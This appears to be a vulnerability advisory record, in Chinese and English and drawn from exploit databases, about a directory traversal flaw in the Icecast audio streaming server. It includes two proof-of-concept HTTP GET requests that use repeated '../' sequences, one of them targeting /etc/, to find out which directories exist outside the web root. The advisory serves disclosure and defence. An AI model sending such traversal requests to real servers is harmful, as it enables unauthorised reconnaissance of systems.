https://www.exploit-db.com/exploits/21602
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-101

Icecast是一款免费开放源代码的音频流服务程序，可使用在多种Unix/Linux操作系统平台下，也可以使用在MicrosoftWindows操作系统下。Icecast服务程序对用户提交的输入缺少正确充分的检查，远程攻击者可以利用这个漏洞进行目录遍历攻击。Icecast服务程序中的list_directory()函数对用户提交的请求缺少充分的过滤，远程攻击者可以提交包含多个’../’字符的URL请求，可导致以Icecast进程的权限查看系统中任意文件内容。

source: http://www.securityfocus.com/bid/5189/info


Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.

An attacker may exploit a directory traversal vulnerability in Icecast server to determine the existance of a specified directory outside of the web root. This is a result of the server returning different HTTP results for each case.

GET /file/../../../../../../../../nonexistent/ HTTP/1.0

GET /file/../../../../../../../../etc/ HTTP/1.0

来源:BID
名称:5189
链接:http://www.securityfocus.com/bid/5189
来源:XF
名称:icecast-dotdot-information-disclosure(9530)
链接:http://www.iss.net/security_center/static/9530.php
来源：NSFOCUS
名称：3095
链接：http://www.nsfocus.net/vulndb/3095